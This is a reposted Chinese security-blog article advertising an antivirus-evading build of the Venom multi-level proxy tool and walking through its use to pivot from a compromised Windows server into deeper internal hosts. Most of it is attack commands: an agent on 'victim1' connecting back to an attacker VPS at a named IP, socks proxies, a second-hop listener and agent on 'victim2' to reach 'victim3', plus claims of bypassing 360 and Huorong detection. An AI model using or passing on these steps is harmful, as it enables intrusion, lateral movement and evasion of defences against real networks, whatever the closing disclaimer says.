360+火绒免杀版内网多级代理工具(Venom毒液)

admin 2024年6月25日14:13:03评论41 views字数 841阅读2分48秒阅读模式
 

01工具介绍
原项目地址(注意免杀的是客户端,服务端自己从原项目下载使用)

https://github.com/Dliv3/Venom

360+火绒免杀版内网多级代理工具(Venom毒液)

02 360查杀

360+火绒免杀版内网多级代理工具(Venom毒液)

360+火绒免杀版内网多级代理工具(Venom毒液)

360+火绒免杀版内网多级代理工具(Venom毒液)

03火绒查杀

360+火绒免杀版内网多级代理工具(Venom毒液)

360+火绒免杀版内网多级代理工具(Venom毒液)

04工具使用

360+火绒免杀版内网多级代理工具(Venom毒液)

我们最终要在 victim1 上建立一级代理,在 victim2 上建立二级代理 , 然后才能访问到 victim3

环境

拿下 victim1 的shell有台vps还有你的笔记本

一级代理

在 vps ( kali ) 上 , 上传 admin 端

./admin_linux_x64 -lport 9999 -passwd mhx

在 Victim1 ( win2008) 上 , 上传 agent 端

./agent.exe -rhost VPS_ip -rport 9999 -passwd mhxagent.exe -rhost 192.168.6.157 -rport 9999 -passwd mhxOCVhTxAOgL.exe -rhost 119.3.12.54 -rport 9999 -passwd mhx

360+火绒免杀版内网多级代理工具(Venom毒液)

设置socks代理

goto 1socks 7777

360+火绒免杀版内网多级代理工具(Venom毒液)

然后设置全局代理 192.168.6.157:7777 , 访问 10.10.10.4/phpinfo.php

360+火绒免杀版内网多级代理工具(Venom毒液)

在一级代理下,我们也很顺利地访问到 victim2 ( win7 ) , 然后getshell

二级代理

在节点1上开启监听 , 本质上就是通过agent , 在win2008开启监听 , 等待win7链接

goto 1listen 9998

接下来就是把 agent 上传到 win7 , 链接刚才的监听

agent64.exe -rhost 10.10.10.3 -rport 9998 -passwd mhx

360+火绒免杀版内网多级代理工具(Venom毒液)

然后去节点2上开启 socks , 然后配置全局代理,即可访问 victim3 ( win2012 )

goto 2socks 6666

360+火绒免杀版内网多级代理工具(Venom毒液)

然后设置全局代理 192.168.6.157:6666, 访问 http://10.10.11.5:8080

360+火绒免杀版内网多级代理工具(Venom毒液)

360+火绒免杀版内网多级代理工具(Venom毒液)

工具下载

https://github.com/Dliv3/Venom

原文始发于微信公众号(Sec探索者):360+火绒免杀版内网多级代理工具(Venom毒液)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月25日14:13:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   360+火绒免杀版内网多级代理工具(Venom毒液)https://cn-sec.com/archives/2881721.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息